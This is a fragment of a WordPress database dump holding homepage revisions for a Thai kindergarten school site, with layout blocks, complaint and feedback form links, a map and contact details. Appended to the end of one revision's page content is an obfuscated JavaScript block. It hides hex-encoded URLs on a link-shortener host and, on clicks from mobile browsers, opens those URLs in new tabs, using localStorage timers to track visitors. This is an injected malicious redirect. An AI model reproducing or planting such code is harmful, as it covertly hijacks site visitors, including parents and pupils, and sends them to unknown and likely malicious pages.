{\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:11:26','2024-08-30 03:11:26','',19,'http://watprato.ssk.in.th/?p=295',0,'revision','',0),
(296,2,'2024-08-30 10:12:04','2024-08-30 03:12:04','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn 